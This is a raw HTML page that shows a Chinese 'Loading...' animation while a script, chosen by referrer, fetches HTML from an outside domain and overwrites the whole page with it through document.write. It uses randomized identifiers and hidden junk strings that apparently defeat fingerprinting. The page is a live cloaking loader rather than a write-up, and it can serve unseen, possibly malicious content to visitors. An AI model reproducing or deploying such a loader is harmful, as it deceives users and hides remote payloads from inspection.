<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YA0EVKgnl4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YA0EVKgnl4 .O5yFG6ZJVGZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YA0EVKgnl4 .content {
            line-height: 50px;
            text-align: center
        }

        .YA0EVKgnl4 .img {
            width: 100%
        }

        .YA0EVKgnl4 .mTmksr {
            text-align: center
        }

        .YA0EVKgnl4 .mTmksr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YA0EVKgnl4 .mTmksr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YA0EVKgnl4 .mTmksr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YA0EVKgnl4 .mTmksr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YA0EVKgnl4 .mTmksr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YA0EVKgnl4 .mTmksr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YA0EVKgnl4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Tbv9k8XTqOV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZwrsN = Tbv9k8XTqOV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZwrsN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZwrsN +".html?a=share";
		}
		
        WJ1Wa15=url+"#"+new Date().getTime();
        WJ1Wa15 && function() {
            $.get(WJ1Wa15, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>nIrkX8vyiE5emJ6ctwZnx84jL5yBnictcYCNvberOpm</a>
<span style='display:none'>HLIViA3tG2ncxFBy2rghRIJdwLo2Xh</span>
<span style='display:none'>HLIViA3tG2ncxFBy2rghRIJdwLo2Xh</span><div class="YA0EVKgnl4">
    <div class="O5yFG6ZJVGZ">
        <div class="mTmksr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>J2AvuKTO3wUOywr0TbcwVBFO7KPtw553ANUKcwOOQYrHuat9i2CwETYjUaPibcfnDtn7H7tmMS1K7FM</p>
<div style='display:none'>oGfzqrYG0LfhK78Rd</div>
<h1 style='display:none' >BjQllw1bJhQpxq6JgbwWKCzHihH2r3ZZriEa</h1>
<ul style='display:none' >D4PgEw5jHicyXa8UNQWxnLQsoS9jNs5P0Q8Ee3uM255CtDhkO0djshODkj6HMBcQJchXHkIWKKYEwHgLiEt</ul></body>
</html>